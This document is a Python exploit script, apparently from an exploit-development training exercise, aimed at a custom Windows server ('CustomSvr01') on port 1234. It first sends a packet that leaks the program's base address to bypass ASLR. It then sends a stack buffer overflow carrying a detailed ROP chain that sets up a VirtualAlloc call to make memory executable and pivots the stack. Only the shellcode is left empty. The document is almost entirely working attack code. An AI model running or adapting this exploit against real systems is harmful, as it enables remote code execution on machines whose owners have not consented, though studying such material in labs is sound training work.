Extra Mile - Custom_srvr.exe Exploit
import socket
import sys
from struct import pack
def getBase(bytstr):
bigByte = bytstr[16:24]
i = len(bigByte)
#shameful
smolbyte = bigByte[6]+bigByte[7]+ bigByte[4]+bigByte[5] + bigByte[2]+bigByte[3] + bigByte[0]+bigByte[1]
print('CustomSvr01+0x1e70: ' + smolbyte)
base = int(smolbyte, 16) - 0x1e70
return base
def leakbaseAddr():
#Third dword -> CustomSvr01+0x1e70
buf = pack("<L", (0x80ffffff))
buf += pack("<L", (0x308)) #esi == 308 GetUserNameA
buf += bytearray([0x41]*0x04)
buf += pack("<L",(0x80))
buf += bytearray([0x41]*0x60)
buf = pack("<L", (0x33445566 ^ (len(buf)+0x04))) + buf #checksum
server = sys.argv[1]
port = 1234
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
s.send(buf)
r = s.recv(1024)
resp = r.encode("hex")
s.close()
print("[+] Packet sent")
base = getBase(resp)
print(resp)
return base
def main():
if len(sys.argv) != 2:
print("Usage: %s <ip_address>\n" % (sys.argv[0]))
sys.exit(1)
base = leakbaseAddr()
shellcode = b""
buf = pack("<L", (0x80ffffff))
buf += pack("<L", (0x305)) #esi == 305
buf += bytearray([0x41]*0x04)
buf += pack("<L",(0x80))
buf += bytearray([0x41]*0x24)
buf += shellcode
buf += bytearray([0x41]* (0xfe8 - len(shellcode)))
#buf += bytearray([0x41]*0x100C) #overwrite calling functions first ret call stack
#ROP buf += pack("<I", base+)
buf += pack("<I", base+0x550a) # pop eax; pop ebp; ret;
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk
buf += pack("<I", base+0x2d05) # pop edi; ret; :: CustomSvr01.exe
buf += pack("<I", base+0x14018) #virtualalloc IAT
buf += pack("<I", base+0x13b4) #0x301013b4 # aas; push esi; add byte [eax], al; pop ecx; ret get our shellcode in ecx
buf += pack("<I", base+0x41b9) # mov eax, [edi]; mov [ecx], eax; mov byte [ecx+0x04], 0x00; pop edi; pop ebp; ret
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk
buf += pack("<I", base+0x11fe)#0x301011fe # add ecx, 4; ret;
#shellgame to get edx -> staging area + 4
buf += pack("<I", base+0x130cb) # mov ebx, ecx; mov ecx, eax; mov eax, esi; pop esi; retn 0x0010
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+0x130c9) # mov edx, ebx; mov ebx, ecx; mov ecx, eax; mov eax, esi; pop esi; retn 0x0010
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data ret 10 #1 + pop esi
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
#ecx -> staging area; shellcode buffer set at offset 0x28
buf += pack("<I", base+0x172c) # mov eax, ecx; ret; :: CustomSvr01.exe
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data ret 10 #2
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+0x76d6) # add eax, 0x14; ret
buf += pack("<I", base+0x76d6) # add eax, 0x14; ret
buf += pack("<I", base+0x54ef) # mov dword ptr [edx], eax; mov al, 1; ret; ::
#increase edx by 4 and do it again
buf += pack("<I", base+0x1ad2) # pop ebx; ret; :: CustomSvr01.exe
buf += pack("<L",(0x04))
buf += pack("<I", base+0x1319e) #add edx, ebx; pop ebx; ret 0x10;
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+0x172c) # mov eax, ecx; ret; :: CustomSvr01.exe
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data ret 10 #2
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+0x76d6) # add eax, 0x14; ret
buf += pack("<I", base+0x76d6) # add eax, 0x14; ret
buf += pack("<I", base+0x54ef) # mov dword ptr [edx], eax; mov al, 1; ret; ::
#edx + 4 -> dwSize == 0x01
buf += pack("<I", base+0x1ad2) # pop ebx; ret; :: CustomSvr01.exe
buf += pack("<L",(0x04))
buf += pack("<I", base+0x1319e) #add edx, ebx; pop ebx; ret 0x10;
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+0x120e) # pop ecx; ret; :: CustomSvr01.exe
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data ret 10 #2
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<L",(0x01)) #value for ecx
buf += pack("<I", base+0x172c) # mov eax, ecx; ret; :: CustomSvr01.exe
buf += pack("<I", base+0x54ef) # mov dword ptr [edx], eax; mov al, 1; ret; ::
#edx + 4 -> flAllocationType == 0x01000
buf += pack("<I", base+0x1ad2) # pop ebx; ret; :: CustomSvr01.exe
buf += pack("<L",(0x04))
buf += pack("<I", base+0x1319e) #add edx, ebx; pop ebx; ret 0x10;
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+0x120e) # pop ecx; ret; :: CustomSvr01.exe
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data ret 10 #2
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<L",(0xfff)) #value for ecx
buf += pack("<I", base+0x172c) # mov eax, ecx; ret; :: CustomSvr01.exe
buf += pack("<I", base+0x40f0) # inc eax; pop ebp; ret
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+0x54ef) # mov dword ptr [edx], eax; mov al, 1; ret; ::
#edx + 4 -> flProtect == 0x40
buf += pack("<I", base+0x1ad2) # pop ebx; ret; :: CustomSvr01.exe
buf += pack("<L",(0x04))
buf += pack("<I", base+0x1319e) #add edx, ebx; pop ebx; ret 0x10;
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+0x120e) # pop ecx; ret; :: CustomSvr01.exe
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data ret 10 #2
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<L",(0x40)) #value for ecx
buf += pack("<I", base+0x172c) # mov eax, ecx; ret; :: CustomSvr01.exe
buf += pack("<I", base+0x54ef) # mov dword ptr [edx], eax; mov al, 1; ret; ::
#edx - 18
buf += pack("<I", base+0x1ad2) # pop ebx; ret; :: CustomSvr01.exe
buf += pack("<L",(0xffffffe8)) #-18
buf += pack("<I", base+0x1319e) #add edx, ebx; pop ebx; ret 0x10;
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+0x2092) # mov edi, edx; ret;
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data ret 10 #2
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+0x6282) # mov eax, edi; pop edi; pop esi; ret
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+ 0x1B000 + 0x124C + 0x4) #writeable junk .data
buf += pack("<I", base+0x3331) # xchg eax, ebp; ret; :: CustomSvr01.exe
buf += pack("<I", base+0x1040) # mov esp, ebp; pop ebp; ret; :: CustomSvr01.exe
#esi & edi point to buf
buf = pack("<L", (0x33445566 ^ (len(buf)+0x04))) + buf #checksum
server = sys.argv[1]
port = 1234
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
s.send(buf)
s.close()
print("[+] Packet sent")
sys.exit(0)
if __name__ == "__main__":
main()
Last updated
Was this helpful?